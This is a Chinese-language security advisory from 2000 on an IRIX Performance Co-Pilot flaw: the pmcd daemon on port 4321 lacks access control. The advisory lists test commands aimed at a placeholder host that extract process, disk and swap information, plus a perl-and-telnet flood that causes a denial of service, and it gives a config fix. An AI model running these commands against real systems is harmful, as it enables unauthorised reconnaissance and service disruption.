IRIX 6.5 Performance Copilot 泄漏系统信息漏洞
发布日期:2000-04-14
更新日期:2000-04-15
受影响系统:pcp_eoe Performance Co-Pilot v2.1
+
IRIX 6.2, 6.3, 6.4 或者 6.5.5
描述:
IRIX 6.5.6缺省安装了一个软件"Performance Copilot" (PCP),这个软件用来收集系统性
能信息并设法进行分析。它包含一个守护进程程序,缺省是在/usr/etc/pmcd下面,这个程序
会监听4321端口,应答PCP用户发来的请求,提供系统信息资料。不幸的是,缺省情况下它
并没有做访问控制,因此任意远程用户都可以通过发送请求命令,获取系统的敏感信息,例
如: ps -elf,df等等。 另外它在接受大量数据包时,会占用大量系统资源,可能导致拒绝服
务攻击。
<* 来源:Marcelo Magnasco (mgnsclb@ROCKVAX.ROCKEFELLER.EDU) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
% pminfo -f -h sgi.victim.com filesys.mountdir
这个命令将列出所有磁盘以及它们的mount路径信息
% pmem -h sgi.victim.com
这个命令将会返回类似ps -elf产生的信息:包括所有进程名,参数以及属主名
% pminfo -f -h sgi.victim.com swap
这个命令将会告诉你系统swap使用情况
% perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321
这个命令将会使pmcd进程占用大量内存/硬盘空间,直到按ctrl_c中止连接。
这可能能导致远程系统的拒绝服务攻击。
建议:
IRIX正在着手进行修复工作。
临时解决方法是:
在/etc/pmcd.conf中增加下列几条配置语句,以限制外部访问此进程:
[access]
allow localhost: all ;
disallow * : all;
浏览次数:8073
严重程度:0(网友投票)